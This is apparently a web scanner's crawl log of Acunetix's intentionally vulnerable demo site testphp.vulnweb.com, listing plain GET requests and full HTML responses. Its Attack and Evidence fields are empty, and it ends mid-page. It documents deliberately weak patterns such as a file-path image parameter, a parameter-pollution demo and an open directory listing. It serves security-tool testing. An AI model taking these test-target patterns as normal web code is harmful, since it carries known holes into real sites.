Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5524 |
Response Body - size: 5,524 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>disclaimer</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">Disclaimer</h2> <div class="story"> <h6>Please read carefully</h6> <p>This website is created to demonstrate the abilities of Acunetix new product <strong>WEB Vulnerability Scanner</strong>.</p> It is not intended to be a real online shop. Also this website was constructed with common web programming errors so it is buggy. <p>Please do not post any confidential information on this site. Do not give any creditcard number or real address, nor e-mail or website addresses.</p> <p>Information you post on this site are by no means private nor protected!</p> <p>All images on this site were generated with fre software <a href="http://www.eclectasy.com/Fractal-Explorer/index.html" target="_blank"> <strong>Fractal Explorer</strong></a>.</p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 264 bytes. |
GET http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5390 |
Response Body - size: 5,390 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong></strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/high |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 255 bytes. |
GET http://testphp.vulnweb.com/high HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 155 bytes. |
HTTP/1.1 404 Not Found
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:51 GMT Content-Type: text/html Content-Length: 153 Connection: keep-alive |
Response Body - size: 153 bytes. |
<html>
<head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.19.0</center> </body> </html> |
URL | http://testphp.vulnweb.com/hpp/ |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 255 bytes. |
GET http://testphp.vulnweb.com/hpp/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 203 |
Response Body - size: 203 bytes. |
<title>HTTP Parameter Pollution Example</title>
<a href="?pp=12">check</a><br/> <hr> <a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a> |
URL | http://testphp.vulnweb.com/hpp/?pp=12 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 266 bytes. |
GET http://testphp.vulnweb.com/hpp/?pp=12 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:05 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 383 |
Response Body - size: 383 bytes. |
<title>HTTP Parameter Pollution Example</title>
<a href="?pp=12">check</a><br/> <a href="params.php?p=valid&pp=12">link1</a><br/><a href="params.php?p=valid&pp=12">link2</a><br/><form action="params.php?p=valid&pp=12"><input type=submit name=aaaa/></form><br/> <hr> <a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a> |
URL | http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 290 bytes. |
GET http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/?pp=12 |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7 |
Response Body - size: 7 bytes. |
valid12
|
URL | http://testphp.vulnweb.com/images/ |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/images/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/images |
Request Body - size: 0 bytes. |
|
Response Header - size: 148 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:52 GMT Content-Type: text/html Connection: keep-alive Content-Length: 377 |
Response Body - size: 377 bytes. |
<html>
<head><title>Index of /images/</title></head> <body> <h1>Index of /images/</h1><hr><pre><a href="../">../</a> <a href="logo.gif">logo.gif</a> 11-May-2011 10:27 6660 <a href="remark.gif">remark.gif</a> 11-May-2011 10:27 79 </pre><hr></body> </html> |
URL | http://testphp.vulnweb.com/index.php |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/index.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7994 |
Response Body - size: 7,994 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>r4w8173</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=6'><h3>Thing</h3></a><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=6','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5193 |
Response Body - size: 5,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a 